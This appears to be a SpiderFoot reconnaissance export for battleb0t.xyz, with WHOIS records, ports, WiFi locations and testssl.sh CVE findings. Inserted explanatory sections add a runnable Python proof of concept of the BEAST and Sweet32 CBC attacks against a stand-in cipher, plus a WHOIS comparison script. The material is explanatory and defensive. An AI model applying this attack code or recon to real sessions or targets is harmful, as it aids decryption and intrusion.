Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@gmo.jp
Registrar Abuse Contact Phone: +81.337709199
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:17:37.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: ayha.xyz
Registry Domain ID: D293590239-CNIC
Registrar WHOIS Server: whois.discount-domain.com
Registrar URL: http://www.onamae.com
Updated Date: 2023-04-26T06:12:30Z
Creation Date: 2022-04-25T16:34:14Z
Registrar Registration Expiration Date: 2023-04-25T23:59:59Z
Registrar: GMO INTERNET, INC.
Registrar IANA ID: 49
Registrar Abuse Contact Email: abuse@gmo.jp
Registrar Abuse Contact Phone: +81.337709199
Domain Status: ok https://icann.org/epp#ok
Registry Registrant ID: E4D57C1767DC8C
Registrant Name: Whois Privacy Protection Service by onamae.com
Registrant Organization: Whois Privacy Protection Service by onamae.com
Registrant Street: 26-1 Sakuragaoka-cho
Registrant Street: Cerulean Tower 11F
Registrant City: Shibuya-ku
Registrant State/Province: Tokyo
Registrant Postal Code: 150-8512
Registrant Country: JP
Registrant Phone: +81.354562560
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: proxy@whoisprotectservice.com
Registry Admin ID: E4D57C3C00BE9C
Admin Name: Whois Privacy Protection Service by onamae.com
Admin Organization: Whois Privacy Protection Service by onamae.com
Admin Street: 26-1 Sakuragaoka-cho
Admin Street: Cerulean Tower 11F
Admin City: Shibuya-ku
Admin State/Province: Tokyo
Admin Postal Code: 150-8512
Admin Country: JP
Admin Phone: +81.354562560
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: proxy@whoisprotectservice.com
Registry Tech ID: E4D27D6C252D99
Tech Name: Whois Privacy Protection Service by onamae.com
Tech Organization: Whois Privacy Protection Service by onamae.com
Tech Street: 26-1 Sakuragaoka-cho
Tech Street: Cerulean Tower 11F
Tech City: Shibuya-ku
Tech State/Province: Tokyo
Tech Postal Code: 150-8512
Tech Country: JP
Tech Phone: +81.354562560
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: proxy@whoisprotectservice.com
Name Server: ns1.gm111.parklogic.com
Name Server: ns2.gm111.parklogic.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-04-26T06:12:30Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 03:10:00 | Affiliate - Internet Name | No | DNS Resolver | 1 | 0 | 4 | 0 | None | netherlands-18708423.mongo.ondigitalocean.com | 165.232.113.94 |
| 2023-05-12 03:00:31 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.21): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BJNPSETUP (Net ID: 00:00:85:F3:6A:27) | 41.8781, -87.6298 |
| 2023-05-12 02:46:17 | Physical Location | No | MetaDefender | 0 | 0 | 3 | 0 | None | San Francisco, United States | 172.67.168.252 |
| 2023-05-12 03:32:29 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.15:80 | 188.114.97.0/24 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 02:30:14 (Net ID: 00:02:2D:03:B5:67) | 37.7642, -122.3993 |
| 2023-05-12 03:23:29 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.10:80 | 188.114.96.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | no_ssid (Net ID: 00:00:D1:F0:AA:05) | 41.8781, -87.6298 |
| 2023-05-12 03:12:41 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 2 | 2 | 0 | None | CVE-2016-6329
https://nvd.nist.gov/vuln/detail/CVE-2016-6329
Score: 5.9
Description: OpenVPN, when using a 64-bit block cipher, makes it easier for remote attackers to obtain cleartext data via a birthday attack against a long-duration encrypted session, as demonstrated by an HTTP-over-OpenVPN session using Blowfish in CBC mode, aka a "Sweet32" attack. | 188.114.97.1 |
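Both testssl.sh findings recorded in this scan (CVE-2011-3389 "BEAST" against nwapi.battleb0t.xyz and CVE-2016-6329 "Sweet32" against 188.114.97.1) describe weaknesses of CBC mode itself rather than a bug in one product: BEAST abuses the SSL 3.0 / TLS 1.0 habit of chaining the IV of each record to the previous record's last ciphertext block, and Sweet32 abuses the birthday bound of a 64-bit block. The script below is an added example written for this page; it is not part of the SpiderFoot output and not code from testssl.sh. It assumes a stand-in block cipher (a small HMAC-SHA256 Feistel network, chosen only so the script runs on the Python standard library), simplified zero padding instead of TLS padding, and a constructed cookie-like secret. Both attacks are carried out against that stand-in exactly as they would be against a real CBC session.

```python
import hashlib
import hmac
import secrets


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt_block(key: bytes, block: bytes) -> bytes:
    """Stand-in block cipher (ASSUMPTION, not a real cipher): a 4-round Feistel
    network with an HMAC-SHA256 round function. It is a keyed permutation, which
    is all either attack relies on; it replaces AES/3DES/Blowfish only so the
    example runs on the standard library. Block length must be even."""
    half = len(block) // 2
    left, right = block[:half], block[half:]
    for i in range(4):
        f = hmac.new(key, bytes([i]) + right, hashlib.sha256).digest()[:half]
        left, right = right, _xor(left, f)
    return left + right


class ChainedIvCbc:
    """CBC session whose record IV is the previous record's last ciphertext
    block, as in SSL 3.0 / TLS 1.0 (the weakness behind BEAST)."""

    def __init__(self, key: bytes, bs: int):
        self.key, self.bs = key, bs
        self.chain = secrets.token_bytes(bs)  # only the very first IV is random

    def send(self, plaintext: bytes) -> list:
        """Encrypt one record; returns its ciphertext blocks (what the network sees)."""
        if len(plaintext) % self.bs:  # simplified zero padding, not TLS padding
            plaintext += b"\x00" * (self.bs - len(plaintext) % self.bs)
        blocks = []
        for i in range(0, len(plaintext), self.bs):
            self.chain = encrypt_block(self.key, _xor(plaintext[i:i + self.bs], self.chain))
            blocks.append(self.chain)
        return blocks


def beast_recover(session: ChainedIvCbc, victim, secret_len: int) -> bytes:
    """Attacker side of CVE-2011-3389. victim(prefix) makes the victim send
    prefix || secret over `session` (the attacker picks the prefix, e.g. via
    injected script) and returns that record's ciphertext blocks. The next IV
    is the last ciphertext block the attacker already saw, so guess G for block
    P[j] is tested by sending X = G ^ C[j-1] ^ IV_next: the server encrypts
    E(G ^ C[j-1]), which equals C[j] iff G == P[j]. The prefix length is chosen
    so exactly one unknown byte sits at the end of a block (<= 256 tries)."""
    bs, known = session.bs, b""
    for k in range(secret_len):
        pad_len = bs - 1 - (k % bs)            # makes secret[k] the last byte of its block
        prefix = b"A" * pad_len
        iv = session.chain                     # IV of the victim's next record
        cts = [iv] + victim(prefix)            # cts[j] chains into block j, cts[j+1] is C[j]
        j = (pad_len + k) // bs
        head = (prefix + known)[j * bs:(j + 1) * bs - 1]   # the bs-1 known bytes of block j
        for b in range(256):
            probe = _xor(_xor(head + bytes([b]), cts[j]), session.chain)
            if session.send(probe)[0] == cts[j + 1]:
                known += bytes([b])
                break
        else:
            raise RuntimeError("no guess matched: the chained-IV assumption does not hold")
    return known


def sweet32_recover(key: bytes, bs: int, victim_secret: bytes, max_requests: int):
    """Birthday attack of CVE-2016-6329 on one long CBC chain of bs-byte blocks.
    Simulated traffic: request r carries an attacker-known block (the counter r)
    followed by one secret block (e.g. a cookie). In CBC, C[i] == C[j] implies
    P[i] ^ P[j] == C[i-1] ^ C[j-1], so a collision between a known block and the
    secret block (expected after ~2^(4*bs) blocks) exposes the secret.
    Returns (recovered secret or None, number of blocks observed)."""
    prev = secrets.token_bytes(bs)   # fresh random IV; the attack does not need it
    seen = {}                        # ciphertext -> (kind, preceding ciphertext, known pt or None)
    observed = 0
    for r in range(max_requests):
        for kind, pt in (("known", r.to_bytes(bs, "big")), ("secret", victim_secret)):
            ct = encrypt_block(key, _xor(pt, prev))   # victim encrypts; the attacker sees only ct
            observed += 1
            if ct in seen:
                kind2, prev2, known2 = seen[ct]
                if kind != kind2:                     # one side known, the other is the secret
                    known_pt = pt if kind == "known" else known2
                    return _xor(_xor(known_pt, prev), prev2), observed
            else:
                seen[ct] = (kind, prev, pt if kind == "known" else None)
            prev = ct
    return None, observed


def run_beast_demo(secret: bytes = b"SESSIONID=7f3a9c") -> bytes:
    """64-bit blocks; the victim sends attacker-chosen prefix + its cookie."""
    session = ChainedIvCbc(secrets.token_bytes(32), bs=8)
    return beast_recover(session, lambda prefix: session.send(prefix + secret), len(secret))


def run_sweet32_demo(secret: bytes = b"ck") -> tuple:
    """16-bit blocks so the birthday bound (~2^8 blocks) is hit instantly; with a
    64-bit cipher the same attack needs ~2^32 blocks, i.e. about 32 GiB."""
    return sweet32_recover(secrets.token_bytes(32), 2, secret, max_requests=30000)


if __name__ == "__main__":
    print("BEAST recovered  :", run_beast_demo())
    print("Sweet32 recovered:", run_sweet32_demo())
```

testssl.sh raises both of these from what the server offers (CBC suites under TLS 1.0 for BEAST, 64-bit-block suites such as 3DES, Blowfish or IDEA for Sweet32), so a row like the ones above means the precondition is present, not that the attack was performed; the fix on the server side is to stop offering those suites and protocol versions.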
| 2023-05-12 02:44:28 | IP Address | No | DNS Resolver | 73 | 0 | 2 | 0 | None | 34.148.97.127 | funny.battleb0t.xyz |
| 2023-05-12 03:31:33 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | abuse@namesilo.com | Domain Name: AAHU.XYZ
Registry Domain ID: D289905874-CNIC
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: https://www.namesilo.com
Updated Date: 2022-06-06T11:23:48.0Z
Creation Date: 2022-04-10T16:51:06.0Z
Registry Expiry Date: 2024-04-10T23:59:59.0Z
Registrar: NameSilo, LLC
Registrar IANA ID: 1479
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: autoRenewPeriod https://icann.org/epp#autoRenewPeriod
Registrant Organization: See PrivacyGuardian.org
Registrant State/Province: AZ
Registrant Country: US
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: LINDA.NS.GIANTPANDA.COM
Name Server: VIVIAN.NS.GIANTPANDA.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@namesilo.com
Registrar Abuse Contact Phone: +1.4805240066
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:17:36.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Domain Name: aahu.xyz
Registry Domain ID: D289905874-CNIC
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: https://www.namesilo.com/
Updated Date: 2023-04-10T07:00:00Z
Creation Date: 2022-04-10T07:00:00Z
Registrar Registration Expiration Date: 2023-04-10T07:00:00Z
Registrar: NameSilo, LLC
Registrar IANA ID: 1479
Registrar Abuse Contact Email: abuse@namesilo.com
Registrar Abuse Contact Phone: +1.4805240066
Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: See PrivacyGuardian.org
Registrant Street: 1928 E. Highland Ave. Ste F104 PMB# 255
Registrant City: Phoenix
Registrant State/Province: AZ
Registrant Postal Code: 85016
Registrant Country: US
Registrant Phone: +1.3478717726
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: pw-55286b4dad8e2523890cab5484722bf1@privacyguardian.org
Registry Admin ID:
Admin Name: Domain Administrator
Admin Organization: See PrivacyGuardian.org
Admin Street: 1928 E. Highland Ave. Ste F104 PMB# 255
Admin City: Phoenix
Admin State/Province: AZ
Admin Postal Code: 85016
Admin Country: US
Admin Phone: +1.3478717726
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: pw-55286b4dad8e2523890cab5484722bf1@privacyguardian.org
Registry Tech ID:
Tech Name: Domain Administrator
Tech Organization: See PrivacyGuardian.org
Tech Street: 1928 E. Highland Ave. Ste F104 PMB# 255
Tech City: Phoenix
Tech State/Province: AZ
Tech Postal Code: 85016
Tech Country: US
Tech Phone: +1.3478717726
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: pw-55286b4dad8e2523890cab5484722bf1@privacyguardian.org
Name Server: hugh.ns.cloudflare.com
Name Server: ryleigh.ns.cloudflare.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T07:00:00Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE AND TERMS OF USE: You are not authorized to access or query our WHOIS
database through the use of high-volume, automated, electronic processes. The
Data in our WHOIS database is provided for information purposes only, and to
assist persons in obtaining information about or related to a domain name
registration record. We do not guarantee its accuracy. By submitting a WHOIS
query, you agree to abide by the following terms of use: You agree that you may
use this Data only for lawful purposes and that under no circumstances will you
use this Data to: (1) allow, enable, or otherwise support the transmission of
mass unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes that
apply to us (or our computer systems). The compilation, repackaging,
dissemination or other use of this Data is expressly prohibited without our
prior written consent. We reserve the right to terminate your access to the
WHOIS database at our sole discretion, including without limitation, for
excessive querying of the WHOIS database or for failure to otherwise abide by
this policy. We reserve the right to modify these terms at any time.
Domains - cheap, easy, and secure at NameSilo.com
https://www.namesilo.com
Register your domain now at www.NameSilo.com - Domains. Cheap, Fast and Secure
|
| 2023-05-12 02:44:05 | SSL Certificate - Issued to | No | CertSpotter | 1 | 0 | 1 | 0 | None | CN=funny.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 02:56:19 | Netblock Membership | No | RIPE | 0 | 0 | 2 | 0 | None | 188.114.97.0/24 | 188.114.97.1 |
| 2023-05-12 03:00:50 | Co-Hosted Site | No | HackerTarget | 1 | 0 | 2 | 0 | None | 0.dontkillmyapp.com | 185.199.111.153 |
| 2023-05-12 02:44:28 | IP Address | No | DNS Resolver | 0 | 0 | 2 | 0 | None | 104.21.71.14 | nwapi.battleb0t.xyz |
| 2023-05-12 03:31:30 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 7 | 0 | None | abuse@namecheap.com | Domain Name: 01def.io
Registry Domain ID: e5ba8be85003487fa75e094c9481d3b7-DONUTS
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: https://www.namecheap.com/
Updated Date: 2022-06-08T05:38:27Z
Creation Date: 2022-06-03T05:37:56Z
Registry Expiry Date: 2026-06-03T05:37:56Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: Capital Region
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: IS
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext: REDACTED FOR PRIVACY
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext: REDACTED FOR PRIVACY
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext: REDACTED FOR PRIVACY
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext: REDACTED FOR PRIVACY
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:12:12Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Terms of Use: Access to WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the registry database. The data in this record is provided by Identity Digital or the Registry Operator for informational purposes only, and accuracy is not guaranteed. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Identity Digital except as reasonably necessary to register domain names or modify existing registrations. When using the Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. 
Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data provided by Identity Digital can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/. The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Identity Digital Inc. and Registry Operator reserve the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
Domain name: 01def.io
Registry Domain ID: e5ba8be85003487fa75e094c9481d3b7-DONUTS
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 0001-01-01T00:00:00.00Z
Creation Date: 2022-06-03T05:37:56.70Z
Registrar Registration Expiration Date: 2026-06-03T05:37:56.70Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: addPeriod https://icann.org/epp#addPeriod
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: a922252a687d4937a189d1d7289125ed.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: a922252a687d4937a189d1d7289125ed.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: a922252a687d4937a189d1d7289125ed.protect@withheldforprivacy.com
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T00:12:14.09Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 03:01:35 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.117): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SX551572EC4 (Net ID: 00:01:E3:57:2E:C4) | 52.3759, 4.8975 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Wireless (Net ID: 00:09:5B:26:F3:E2) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:13:05 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0036labs.github.io]
https://www.openphish.com/feed.txt | 0036labs.github.io |
| 2023-05-12 03:00:36 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | abuse@namecheap.com | Domain Name: CLOUDWAYSAPPS.COM
Registry Domain ID: 1695307151_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2022-09-12T18:44:13Z
Creation Date: 2012-01-04T12:17:34Z
Registry Expiry Date: 2028-01-04T12:17:34Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.6613102107
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: NS-1086.AWSDNS-07.ORG
Name Server: NS-2016.AWSDNS-60.CO.UK
Name Server: NS-222.AWSDNS-27.COM
Name Server: NS-854.AWSDNS-42.NET
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Registrars.
Domain name: cloudwaysapps.com
Registry Domain ID: 1695307151_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2022-06-22T11:27:03.11Z
Creation Date: 2012-01-04T12:17:34.00Z
Registrar Registration Expiration Date: 2028-01-04T12:17:34.00Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: 28efa154c841448e9e98cc948672b2d4.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: 28efa154c841448e9e98cc948672b2d4.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: 28efa154c841448e9e98cc948672b2d4.protect@withheldforprivacy.com
Name Server: ns-222.awsdns-27.com
Name Server: ns-854.awsdns-42.net
Name Server: ns-1086.awsdns-07.org
Name Server: ns-2016.awsdns-60.co.uk
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T06:41:09.59Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
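The two WHOIS blocks in the row above are different records for the same domain: the thin registry record from VeriSign (no registrant data, "Registry Expiry Date") followed by the thick registrar record from Namecheap (redacted registrant/admin/tech contacts, "Registrar Registration Expiration Date"). They agree on name servers, status, creation and expiry, but differ in Updated Date and in the abuse phone number, which is normal; a name-server or expiry disagreement between the two would not be. The following is an added example (not SpiderFoot code) that parses both records and reports the fields on which they disagree; the embedded excerpts are trimmed copies of the two records shown above, and the list of fields compared is this example's own choice.

```python
"""Compare the registry (thin) and registrar (thick) WHOIS records for one domain
and report where they disagree.  Added example for this page; not SpiderFoot code."""
import re

# Keys that mean the same thing but are spelled differently in the two records.
ALIASES = {
    "registry expiry date": "expiry",
    "registrar registration expiration date": "expiry",
}
# Keys that legitimately repeat; collected as sets so order and case do not matter.
MULTI = {"name server", "domain status"}
# Fields worth comparing (this example's choice); registrant/admin/tech are registrar-only.
COMPARE = ["domain name", "registrar", "registrar iana id", "registrar abuse contact email",
           "registrar abuse contact phone", "creation date", "updated date", "expiry",
           "name server", "domain status", "dnssec"]


def normalise(key, value):
    v = value.strip()
    if key in ("domain name", "name server"):
        return v.lower()                       # registry prints NS names upper-case
    if key.endswith("date") or key == "expiry":
        return re.sub(r"\.\d+Z$", "Z", v)      # registrar prints 2012-01-04T12:17:34.00Z
    if key == "registrar":
        return re.sub(r"[^a-z0-9]", "", v.lower())   # "NameCheap, Inc." == "NAMECHEAP INC"
    return v


def parse_whois(text):
    """Turn 'Key: value' lines into a dict; prose lines without a colon are ignored."""
    rec = {}
    for line in text.splitlines():
        m = re.match(r"^\s*([A-Za-z][A-Za-z /]*?):\s*(.*)$", line)
        if not m:
            continue
        key = ALIASES.get(m.group(1).strip().lower(), m.group(1).strip().lower())
        value = normalise(key, m.group(2))
        if key in MULTI:
            rec.setdefault(key, set()).add(value)
        elif value:
            rec.setdefault(key, value)         # keep the first occurrence
    return rec


def compare(registry, registrar, fields=COMPARE):
    """Fields present in both records whose normalised values differ."""
    diffs = {}
    for f in fields:
        a, b = registry.get(f), registrar.get(f)
        if a is not None and b is not None and a != b:
            diffs[f] = (a, b)
    return diffs


# Trimmed copies of the two records shown in the row above (constructed sample input).
REGISTRY_WHOIS = """Domain Name: CLOUDWAYSAPPS.COM
Registry Domain ID: 1695307151_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Updated Date: 2022-09-12T18:44:13Z
Creation Date: 2012-01-04T12:17:34Z
Registry Expiry Date: 2028-01-04T12:17:34Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.6613102107
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: NS-1086.AWSDNS-07.ORG
Name Server: NS-2016.AWSDNS-60.CO.UK
Name Server: NS-222.AWSDNS-27.COM
Name Server: NS-854.AWSDNS-42.NET
DNSSEC: unsigned
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
"""

REGISTRAR_WHOIS = """Domain name: cloudwaysapps.com
Registry Domain ID: 1695307151_DOMAIN_COM-VRSN
Updated Date: 2022-06-22T11:27:03.11Z
Creation Date: 2012-01-04T12:17:34.00Z
Registrar Registration Expiration Date: 2028-01-04T12:17:34.00Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
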